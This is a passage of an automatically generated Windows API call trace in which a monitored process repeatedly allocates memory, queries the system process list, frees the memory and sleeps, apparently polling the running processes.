ResultLength=0x0) returned 0x0 [0264.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.973] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.983] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.989] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.996] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.004] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.011] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.020] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.028] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.035] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.042] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.048] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.055] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.061] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.068] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.074] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.081] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.088] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.095] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.102] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.110] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.117] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.120] NtAllocateVirtualMemory (in: 